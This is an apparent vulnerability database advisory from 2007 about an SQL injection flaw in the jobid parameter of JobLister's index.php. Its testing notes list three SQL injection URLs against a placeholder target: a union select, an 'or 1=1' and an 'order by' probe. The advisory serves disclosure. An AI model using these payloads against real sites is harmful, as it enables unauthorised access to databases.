JobLister index.php Multiple Variable SQL Injection

2007-08-13T00:00:00
ID OSVDB:36416
Type osvdb
Reporter joseph.giron13(joseph.giron13@gmail.com)
Modified 2007-08-13T00:00:00

Description

Manual Testing Notes

http://[target]/index.php?mode=showbyID&jobid=99786'%20union%20all%20select%20something%20from%20something/ http://[target]/index.php?mode=showbyID&jobid=99786'%20or%201=1/ http://[target]/index.php?mode=showbyID&jobid=99786'%20order%20by%2016/*

References:

Secunia Advisory ID:26440 CVE-2007-4359 Bugtraq ID: 25296